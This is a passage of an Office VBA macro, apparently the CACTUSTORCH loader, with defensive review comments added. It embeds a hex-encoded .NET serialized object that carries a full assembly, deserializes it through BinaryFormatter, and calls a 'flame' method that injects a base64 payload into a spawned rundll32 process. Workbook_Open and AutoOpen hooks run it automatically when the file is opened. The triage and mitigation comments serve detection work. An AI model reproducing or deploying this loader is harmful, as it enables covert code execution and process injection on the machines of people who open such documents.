This can be anything that exists both in SYSWOW64 and SYSTEM32 46 | binary = "rundll32.exe" 47 | 48 | code = "" 49 | 50 | ' Paste the output from splitvba.py below here 51 | code = code & "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgB" 52 | code = code & "TM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqz" 53 | code = code & "ckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUA" 54 | code = code & "AAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAA" 55 | code = code & "AAIAAAUAAAAAAAAABQAAAAA" 56 | End Sub 57 | 58 | Private Function decodeHex(hex) 59 | On Error Resume Next 60 | Dim DM, EL 61 | Set DM = CreateObject("Microsoft.XMLDOM") 62 | Set EL = DM.createElement("tmp") 63 | EL.DataType = "bin.hex" 64 | EL.Text = hex 65 | decodeHex = EL.NodeTypedValue 66 | End Function 67 | 68 | Function Run() 69 | 70 | On Error Resume Next 71 | 72 | SetVersion 73 | 74 | Dim serialized_obj 75 | serialized_obj = "0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F" 76 | serialized_obj = serialized_obj & "6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C" 77 | serialized_obj = serialized_obj & "656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65" 78 | serialized_obj = serialized_obj & "6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E" 79 | serialized_obj = serialized_obj & "666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44" 80 | serialized_obj = serialized_obj & "656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508" 81 | serialized_obj = serialized_obj & 
"617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A" 82 | serialized_obj = serialized_obj & "6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C6567617465536572" 83 | serialized_obj = serialized_obj & "69616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65" 84 | serialized_obj = serialized_obj & "2E52656D6F74696E672E4D6573736167696E672E48656164657248616E646C657206060000004B6D73636F726C69622C2056" 85 | serialized_obj = serialized_obj & "657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237" 86 | serialized_obj = serialized_obj & "376135633536313933346530383906070000000774617267657430090600000006090000000F53797374656D2E44656C6567" 87 | serialized_obj = serialized_obj & "617465060A0000000D44796E616D6963496E766F6B650A04030000002253797374656D2E44656C656761746553657269616C" 88 | serialized_obj = serialized_obj & "697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300307033053797374" 89 | serialized_obj = serialized_obj & "656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E747279022F53797374" 90 | serialized_obj = serialized_obj & "656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C646572090B000000090C" 91 | serialized_obj = serialized_obj & "000000090D00000004040000002F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A" 92 | serialized_obj = serialized_obj & "6174696F6E486F6C64657206000000044E616D650C417373656D626C794E616D6509436C6173734E616D65095369676E6174" 93 | serialized_obj = serialized_obj & "7572650A4D656D626572547970651047656E65726963417267756D656E7473010101010003080D53797374656D2E54797065" 94 | serialized_obj = serialized_obj & "5B5D090A0000000906000000090900000006110000002C53797374656D2E4F626A6563742044796E616D6963496E766F6B65" 95 | serialized_obj = serialized_obj & 
"2853797374656D2E4F626A6563745B5D29080000000A010B0000000200000006120000002053797374656D2E586D6C2E5363" 96 | serialized_obj = serialized_obj & "68656D612E586D6C56616C756547657474657206130000004D53797374656D2E586D6C2C2056657273696F6E3D322E302E30" 97 | serialized_obj = serialized_obj & "2E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530" 98 | serialized_obj = serialized_obj & "383906140000000774617267657430090600000006160000001A53797374656D2E5265666C656374696F6E2E417373656D62" 99 | serialized_obj = serialized_obj & "6C790617000000044C6F61640A0F0C000000001E0000024D5A90000300000004000000FFFF0000B800000000000000400000" 100 | serialized_obj = serialized_obj & "000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD" 101 | serialized_obj = serialized_obj & "21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000" 102 | serialized_obj = serialized_obj & "00504500004C0103005886A25A0000000000000000E00022200B013000001600000006000000000000EE3500000020000000" 103 | serialized_obj = serialized_obj & "4000000000001000200000000200000400000000000000040000000000000000800000000200000000000003004085000010" 104 | serialized_obj = serialized_obj & "00001000000000100000100000000000001000000000000000000000009C3500004F00000000400000900300000000000000" 105 | serialized_obj = serialized_obj & "0000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000" 106 | serialized_obj = serialized_obj & "000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E" 107 | serialized_obj = serialized_obj & "74657874000000F4150000002000000016000000020000000000000000000000000000200000602E72737263000000900300" 108 | serialized_obj = serialized_obj & "00004000000004000000180000000000000000000000000000400000402E72656C6F6300000C000000006000000002000000" 109 | serialized_obj = serialized_obj & 
"1C00000000000000000000000000004000004200000000000000000000000000000000D03500000000000048000000020005" 110 | serialized_obj = serialized_obj & "000C220000901300000100000000000000000000000000000000000000000000000000000000000000000000000000000000" 111 | serialized_obj = serialized_obj & "0000000000000000000000000000001E02280F00000A2A13300A001C0100000100001104281000000A0A1201068E69281100" 112 | serialized_obj = serialized_obj & "000A730A0000060C08167D35000004720100007013047203000070281200000A6F1300000A163119721D000070281200000A" 113 | serialized_obj = serialized_obj & "722B00007003281400000A13042B17721D000070281200000A724100007003281400000A13041104141414171A7E1500000A" 114 | serialized_obj = serialized_obj & "14081203280100000626097B0400000413051205281600000A7257000070281700000A3980000000110516731100000A0720" 115 | serialized_obj = serialized_obj & "003000001A280200000613061206281600000A7257000070281800000A2C0A1105162805000006262A1613071208068E6928" 116 | serialized_obj = serialized_obj & "1100000A11051106061108110728040000062611051106071F2016731100000A280300000626110516731100000A16110616" 117 | serialized_obj = serialized_obj & "731100000A1616731100000A2806000006262A7A027E1500000A7D0200000402280F00000A0202281900000A7D010000042A" 118 | serialized_obj = serialized_obj & "00133002006000000000000000027E1500000A7D2B000004027E1500000A7D2C000004027E1500000A7D2D000004027E1500" 119 | serialized_obj = serialized_obj & "000A7D38000004027E1500000A7D39000004027E1500000A7D3A000004027E1500000A7D3B00000402280F00000A02022819" 120 | serialized_obj = serialized_obj & "00000A7D2A0000042A42534A4201000100000000000C00000076322E302E35303732370000000005006C0000005C07000023" 121 | serialized_obj = serialized_obj & "7E0000C80700007409000023537472696E6773000000003C1100005C00000023555300981100001000000023475549440000" 122 | serialized_obj = serialized_obj & "00A8110000E801000023426C6F620000000000000002000001571D02140902000000FA013300160000010000001700000009" 123 | serialized_obj = serialized_obj 
& "000000500000000A000000240000001900000033000000120000000100000001000000060000000100000001000000070000" 124 | serialized_obj = serialized_obj & "000000990601000000000006005C0592070600C905920706008A0460070F00B20700000600B204E10606003005E106060011" 125 | serialized_obj = serialized_obj & "05E1060600B005E10606007C05E10606009505E1060600C904E10606009E04730706007C0473070600F404E1060600AB08A9" 126 | serialized_obj = serialized_obj & "0606006104A90606004D05A9060600B006A9060600E408A90606005907A9060600D808A90606006606A90606008406730700" 127 | serialized_obj = serialized_obj & "00000025000000000001000100010010006D0600003D00010001000A001000F80700003D00010009000A011000CE06000041" 128 | serialized_obj = serialized_obj & "0004000A00020100001B080000490008000A000201000036080000490027000A000A001000060700003D002A000A00020100" 129 | serialized_obj = serialized_obj & "006D04000049003C000B0002010000F3060000490045000B0006007D06FA00060044073F0006002404FD00060074083F0006" 130 | serialized_obj = serialized_obj & "00E7033F000600C803FA000600BD03FA0006069E0300015680B20203015680C00203015680640003015680880203015680C2" 131 | serialized_obj = serialized_obj & "0003015680530203015680F101030156801D0203015680050203015680A001030156800203030156805E0103015680480103" 132 | serialized_obj = serialized_obj & "015680E101030156804D02030156803102030156806A03030156808203030156809902030156801D03030156807601030156" 133 | serialized_obj = serialized_obj & "807500030156803D0003015680270103015680A800030156803A0303015680B90103015680180103015680C60103015680E5" 134 | serialized_obj = serialized_obj & "02030106069E0300015680910007015680720207010600A603FA000600EF033F00060017073F00060033043F0006004B03FA" 135 | serialized_obj = serialized_obj & "0006009A03FA000600E705FA000600EF05FA0006004708FA0006005508FA000600E404FA0006002E08FA00060001090B0106" 136 | serialized_obj = serialized_obj & "000D000B01060019003F000600EC083F000600F6083F00060034073F0006069E0300015680DE020E015680EF000E0156809D" 137 | serialized_obj = 
serialized_obj & "010E015680D8020E015680D5010E0156800F010E01568094010E01568003010E0106069E0300015680E70012015680570012" 138 | serialized_obj = serialized_obj & "015680D500120156805803120156806902120156804F0312015680DD00120156806003120156801106120156802406120156" 139 | serialized_obj = serialized_obj & "803906120100000000800096202E001601010000000000800096200D092A010B0000000000800096201C0935011000000000" 140 | serialized_obj = serialized_obj & "008000962034093F0115000000000080009620630849011A000000000080009120D4034F011C0050200000000086183E0706" 141 | serialized_obj = serialized_obj & "00230058200000000086004D045A01230080210000000086183E0706002500A0210000000086183E0706002500000001003B" 142 | serialized_obj = serialized_obj & "0400000200530400000300E40700000400D10700000500C107000006000B0800000700D60800000800470901000900040702" 143 | serialized_obj = serialized_obj & "000A00CC06000001001B04000002008B08000003000306000004006B0400000500BF08000001001B04000002008B08000003" 144 | serialized_obj = serialized_obj & "00030600000400C90800000500B208000001007408000002007D0800000300210700000400030600000500B5060000010074" 145 | serialized_obj = serialized_obj & "0800000200FA0300000100740800000200D10700000300F705000004009508000005002807000006000B0800000700B20300" 146 | serialized_obj = serialized_obj & "0001002D0900000200010009003E07010011003E07060019003E070A0029003E07100031003E07100039003E07100041003E" 147 | serialized_obj = serialized_obj & "07100049003E07100051003E07100059003E07100061003E07150069003E07100071003E07100089003E07060079003E0706" 148 | serialized_obj = serialized_obj & "00990053062900A1003E070100A90004042F00B10079063400B100A4083800A10012073F00A10064064200B10066094600B1" 149 | serialized_obj = serialized_obj & "005A094600B9000A064C00090024005A00090028005F0009002C006400090030006900090034006E0009003800730009003C" 150 | serialized_obj = serialized_obj & "007800090040007D0009004400820009004800870009004C008C00090050009100090054009600090058009B0009005C00A0" 151 | serialized_obj 
= serialized_obj & "0009006000A50009006400AA0009006800AF0009006C00B40009007000B90009007400BE0009007800C30009007C00C80009" 152 | serialized_obj = serialized_obj & "008000CD0009008400D20009008800D70009008C00DC0009009000E10009009400E60009009800EB000900A0005A000900A4" 153 | serialized_obj = serialized_obj & "005F000900F40096000900F8009B000900FC00F00009000001B90009000401E10009000801F50009000C01BE0009001001C3" 154 | serialized_obj = serialized_obj & "00090018016E0009001C017300090020017800090024017D00090028015A0009002C015F0009003001640009003401690009" 155 | serialized_obj = serialized_obj & "003801820009003C018700090040018C002E000B0060012E00130069012E001B0088012E00230091012E002B0091012E0033" 156 | serialized_obj = serialized_obj & "00A2012E003B00A2012E00430091012E004B0091012E005300A2012E005B00A8012E006300AE012E006B00D80143005B00A8" 157 | serialized_obj = serialized_obj & "01A30073005A00C30073005A00030173005A00230173005A001A008C06000103002E000100000105000D090100000107001C" 158 | serialized_obj = serialized_obj & "090100000109003409010000010B006308010000010D00D4030100048000000100000000000000000000000000F700000002" 159 | serialized_obj = serialized_obj & "00000000000000000000005100A9030000000003000200040002000500020006000200070002000800020009000200000000" 160 | serialized_obj = serialized_obj & "00007368656C6C636F64653332006362526573657276656432006C70526573657276656432003C4D6F64756C653E00437265" 161 | serialized_obj = serialized_obj & "61746550726F6365737341004352454154455F425245414B415741595F46524F4D5F4A4F4200455845435554455F52454144" 162 | serialized_obj = serialized_obj & "004352454154455F53555350454E4445440050524F434553535F4D4F44455F4241434B47524F554E445F454E44004455504C" 163 | serialized_obj = serialized_obj & "49434154455F434C4F53455F534F55524345004352454154455F44454641554C545F4552524F525F4D4F4445004352454154" 164 | serialized_obj = serialized_obj & "455F4E45575F434F4E534F4C4500455845435554455F52454144575249544500455845435554450052455345525645004341" 165 | 
serialized_obj = serialized_obj & "43545553544F5243480057524954455F574154434800504859534943414C0050524F46494C455F4B45524E454C0043524541" 166 | serialized_obj = serialized_obj & "54455F50524553455256455F434F44455F415554485A5F4C4556454C004352454154455F5348415245445F574F575F56444D" 167 | serialized_obj = serialized_obj & "004352454154455F53455041524154455F574F575F56444D0050524F434553535F4D4F44455F4241434B47524F554E445F42" 168 | serialized_obj = serialized_obj & "4547494E00544F505F444F574E00474F004352454154455F4E45575F50524F434553535F47524F55500050524F46494C455F" 169 | serialized_obj = serialized_obj & "555345520050524F46494C455F534552564552004C415247455F5041474553004352454154455F464F524345444F53004944" 170 | serialized_obj = serialized_obj & "4C455F5052494F524954595F434C415353005245414C54494D455F5052494F524954595F434C41535300484947485F505249" 171 | serialized_obj = serialized_obj & "4F524954595F434C4153530041424F56455F4E4F524D414C5F5052494F524954595F434C4153530042454C4F575F4E4F524D" 172 | serialized_obj = serialized_obj & "414C5F5052494F524954595F434C415353004E4F414343455353004455504C49434154455F53414D455F4143434553530044" 173 | serialized_obj = serialized_obj & "455441434845445F50524F43455353004352454154455F50524F5445435445445F50524F434553530044454255475F50524F" 174 | serialized_obj = serialized_obj & "434553530044454255475F4F4E4C595F544849535F50524F4345535300524553455400434F4D4D4954004352454154455F49" 175 | serialized_obj = serialized_obj & "474E4F52455F53595354454D5F44454641554C54004352454154455F554E49434F44455F454E5649524F4E4D454E54004558" 176 | serialized_obj = serialized_obj & "54454E4445445F53544152545550494E464F5F50524553454E54004352454154455F4E4F5F57494E444F5700647758005245" 177 | serialized_obj = serialized_obj & "41444F4E4C5900455845435554455F5752495445434F505900494E48455249545F504152454E545F414646494E4954590049" 178 | serialized_obj = serialized_obj & "4E48455249545F43414C4C45525F5052494F52495459006477590076616C75655F5F006362006D73636F726C6962006C7054" 179 
| serialized_obj = serialized_obj & "68726561644964006477546872656164496400647750726F6365737349640043726561746552656D6F746554687265616400" 180 | serialized_obj = serialized_obj & "68546872656164006C705265736572766564007545786974436F646500476574456E7669726F6E6D656E745661726961626C" 181 | serialized_obj = serialized_obj & "65006C7048616E646C650062496E686572697448616E646C65006C705469746C65006C704170706C69636174696F6E4E616D" 182 | serialized_obj = serialized_obj & "6500666C616D65006C70436F6D6D616E644C696E650056616C75655479706500666C416C6C6F636174696F6E547970650047" 183 | serialized_obj = serialized_obj & "7569644174747269627574650044656275676761626C6541747472696275746500436F6D56697369626C6541747472696275" 184 | serialized_obj = serialized_obj & "746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275" 185 | serialized_obj = serialized_obj & "746500647746696C6C41747472696275746500417373656D626C7946696C6556657273696F6E417474726962757465004173" 186 | serialized_obj = serialized_obj & "73656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C794465736372697074696F6E4174" 187 | serialized_obj = serialized_obj & "7472696275746500466C61677341747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269" 188 | serialized_obj = serialized_obj & "6275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F70797269676874417474" 189 | serialized_obj = serialized_obj & "72696275746500417373656D626C79436F6D70616E794174747269627574650052756E74696D65436F6D7061746962696C69" 190 | serialized_obj = serialized_obj & "74794174747269627574650064775853697A650064775953697A65006477537461636B53697A6500647753697A650053697A" 191 | serialized_obj = serialized_obj & "654F660047554152445F4D6F646966696572666C6167004E4F43414348455F4D6F646966696572666C616700575249544543" 192 | serialized_obj = serialized_obj & "4F4D42494E455F4D6F646966696572666C61670046726F6D426173653634537472696E6700546F537472696E670063616374" 
193 | serialized_obj = serialized_obj & "7573546F726368006765745F4C656E677468004D61727368616C006B65726E656C33322E646C6C00434143545553544F5243" 194 | serialized_obj = serialized_obj & "482E646C6C0053797374656D00456E756D006C704E756D6265724F6642797465735772697474656E006C7050726F63657373" 195 | serialized_obj = serialized_obj & "496E666F726D6174696F6E0053797374656D2E5265666C656374696F6E004D656D6F727950726F74656374696F6E006C7053" 196 | serialized_obj = serialized_obj & "746172747570496E666F005A65726F006C704465736B746F7000627566666572006C70506172616D65746572006853746445" 197 | serialized_obj = serialized_obj & "72726F72002E63746F72006C70536563757269747944657363726970746F7200496E745074720053797374656D2E44696167" 198 | serialized_obj = serialized_obj & "6E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74" 199 | serialized_obj = serialized_obj & "696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730062496E686572697448616E646C65" 200 | serialized_obj = serialized_obj & "73006C7054687265616441747472696275746573006C7050726F636573734174747269627574657300536563757269747941" 201 | serialized_obj = serialized_obj & "7474726962757465730064774372656174696F6E466C6167730043726561746550726F63657373466C616773006477466C61" 202 | serialized_obj = serialized_obj & "6773004475706C69636174654F7074696F6E7300647758436F756E74436861727300647759436F756E744368617273005465" 203 | serialized_obj = serialized_obj & "726D696E61746550726F63657373006850726F63657373006C704261736541646472657373006C7041646472657373006C70" 204 | serialized_obj = serialized_obj & "53746172744164647265737300436F6E636174004F626A65637400666C4F6C6450726F7465637400666C50726F7465637400" 205 | serialized_obj = serialized_obj & "666C4E657750726F74656374006C70456E7669726F6E6D656E7400436F6E766572740068537464496E70757400685374644F" 206 | serialized_obj = serialized_obj & 
"7574707574007753686F7757696E646F77005669727475616C416C6C6F634578005669727475616C50726F74656374457800" 207 | serialized_obj = serialized_obj & "62696E61727900577269746550726F636573734D656D6F7279006C7043757272656E744469726563746F7279006F705F4571" 208 | serialized_obj = serialized_obj & "75616C697479006F705F496E657175616C6974790000010019500072006F006700720061006D005700360034003300320000" 209 | serialized_obj = serialized_obj & "0D770069006E0064006900720000155C0053007900730057004F005700360034005C0000155C00530079007300740065006D" 210 | serialized_obj = serialized_obj & "00330032005C000003300000001662F14473FD1A4190700B9987CFFABE00042001010803200001052001011111042001010E" 211 | serialized_obj = serialized_obj & "04200101020E07091D0518121C11100E181808180500011D050E0400010E0E032000080600030E0E0E0E0206180320000E05" 212 | serialized_obj = serialized_obj & "0002020E0E040001081C08B77A5C561934E08904010000000402000000040400000004080000000410000000042000000004" 213 | serialized_obj = serialized_obj & "4000000004800000000400010000040002000004000400000400080000040010000004002000000400400000040080000004" 214 | serialized_obj = serialized_obj & "0000010004000002000400000400040000080004000010000400002000040000000104000000020400000004040000000804" 215 | serialized_obj = serialized_obj & "0000001004000000200400000040040000008004003000000400004000020608020602020609030611140306111802060603" 216 | serialized_obj = serialized_obj & "0611200306112413000A180E0E120C120C021114180E121C1011100A00051818181811201124090005181818181124180900" 217 | serialized_obj = serialized_obj & "050218181D0518080500020218090A00071818180918180918052002010E0E0801000800000000001E010001005402165772" 218 | serialized_obj = serialized_obj & "61704E6F6E457863657074696F6E5468726F7773010801000200000000001001000B434143545553544F5243480000050100" 219 | serialized_obj = serialized_obj & "0000000501000100002901002435363539386631632D366438382D343939342D613339322D61663333376162653537373700" 220 | serialized_obj = serialized_obj 
& "000C010007312E302E302E300000000000C43500000000000000000000DE3500000020000000000000000000000000000000" 221 | serialized_obj = serialized_obj & "00000000000000D0350000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF" 222 | serialized_obj = serialized_obj & "2500200010000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000" 223 | serialized_obj = serialized_obj & "0000000000010001000000300000800000000000000000000000000000010000000000480000005840000034030000000000" 224 | serialized_obj = serialized_obj & "0000000000340334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00" 225 | serialized_obj = serialized_obj & "000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000" 226 | serialized_obj = serialized_obj & "000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C00610074" 227 | serialized_obj = serialized_obj & "0069006F006E00000000000000B00494020000010053007400720069006E006700460069006C00650049006E0066006F0000" 228 | serialized_obj = serialized_obj & "0070020000010030003000300030003000340062003000000030000C00010043006F006D006D0065006E0074007300000043" 229 | serialized_obj = serialized_obj & "004100430054005500530054004F00520043004800000022000100010043006F006D00700061006E0079004E0061006D0065" 230 | serialized_obj = serialized_obj & "00000000000000000040000C000100460069006C0065004400650073006300720069007000740069006F006E000000000043" 231 | serialized_obj = serialized_obj & "004100430054005500530054004F005200430048000000300008000100460069006C006500560065007200730069006F006E" 232 | serialized_obj = serialized_obj & "000000000031002E0030002E0030002E003000000040001000010049006E007400650072006E0061006C004E0061006D0065" 233 | serialized_obj = serialized_obj & "00000043004100430054005500530054004F005200430048002E0064006C006C0000003C000C0001004C006500670061006C" 234 | serialized_obj = 
serialized_obj & "0043006F007000790072006900670068007400000043004100430054005500530054004F0052004300480000002A00010001" 235 | serialized_obj = serialized_obj & "004C006500670061006C00540072006100640065006D00610072006B00730000000000000000004800100001004F00720069" 236 | serialized_obj = serialized_obj & "00670069006E0061006C00460069006C0065006E0061006D006500000043004100430054005500530054004F005200430048" 237 | serialized_obj = serialized_obj & "002E0064006C006C00000038000C000100500072006F0064007500630074004E0061006D0065000000000043004100430054" 238 | serialized_obj = serialized_obj & "005500530054004F005200430048000000340008000100500072006F006400750063007400560065007200730069006F006E" 239 | serialized_obj = serialized_obj & "00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C007900200056006500720073" 240 | serialized_obj = serialized_obj & "0069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000" 241 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 242 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000C000000F0" 243 | serialized_obj = serialized_obj & "3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 244 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 245 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 246 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 247 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 248 | serialized_obj 
= serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
    ' The two closing chunks are ASCII in hex and end with the text
    ' "System.Reflection.Assembly Load(Byte[])". Together with the "4D5A90" PE header
    ' and the "This program cannot be run in DOS mode" stub earlier in the blob, this
    ' indicates the serialized object graph carries a whole .NET assembly that is
    ' loaded from memory rather than from a file on disk.
    serialized_obj = serialized_obj & "000000010D00000004000000091700000009060000000916000000061A0000002753797374656D2E5265666C656374696F6E"
    serialized_obj = serialized_obj & "2E417373656D626C79204C6F616428427974655B5D29080000000A0B"

    ' Class name passed to CreateInstance below; the same name appears as ASCII
    ' inside the blob.
    entry_class = "cactusTorch"

    ' .NET classes reached through COM from the macro: a stream to hold the decoded
    ' blob, the formatter that deserializes it, and a list used to build the
    ' argument array for DynamicInvoke.
    ' Triage note: an Office process creating these objects and loading the CLR is
    ' not ordinary document behaviour and is worth alerting on.
    Dim stm As Object, fmt As Object, al As Object
    Set stm = CreateObject("System.IO.MemoryStream")
    Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
    Set al = CreateObject("System.Collections.ArrayList")

    ' decodeHex is defined outside this excerpt; presumably it converts the hex
    ' text to bytes, since the result is written to the stream one byte at a time.
    Dim dec
    dec = decodeHex(serialized_obj)

    For Each i In dec
        stm.WriteByte i
    Next i

    ' Rewind so deserialization starts at the first byte written.
    stm.Position = 0

    ' NOTE(review): BinaryFormatter deserialization is the step that turns the data
    ' above into behaviour. The README credits DotNetToJScript for this technique;
    ' Deserialize_2 is presumably the COM-exposed overload that takes a stream.
    Dim n As Object, d As Object, o As Object
    Set n = fmt.SurrogateSelector
    Set d = fmt.Deserialize_2(stm)
    al.Add n

    ' Invokes the deserialized delegate, then instantiates entry_class from what it
    ' returns and calls its flame method. binary and code are assigned outside this
    ' excerpt; per the README, binary names the program that is spawned (32-bit) and
    ' code holds the base64 payload. The blob's strings include CreateProcessA,
    ' VirtualAllocEx, WriteProcessMemory and CreateRemoteThread, which matches the
    ' README's description of injection into a spawned process.
    Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
    o.flame binary,code
End Function

' Auto-execution entry points. Each of the three names below is run by Office
' without user action once macros are enabled for the document, so the loader
' starts as soon as the file is opened. Init is defined outside this excerpt.
' Mitigation: block macros in files that come from the internet, and enable the
' Office attack surface reduction rules covering child-process creation, code
' injection into other processes and Win32 API calls from macros.

' Excel: workbook open event handler.
Sub Workbook_Open()
    Init
    Run
End Sub

' Word: auto-macro run when the document is opened.
Sub AutoOpen()
    Init
    Run
End Sub

' Excel: legacy auto-macro name; forwards to AutoOpen so both hosts share one path.
Sub Auto_Open()
    AutoOpen
End Sub

--------------------------------------------------------------------------------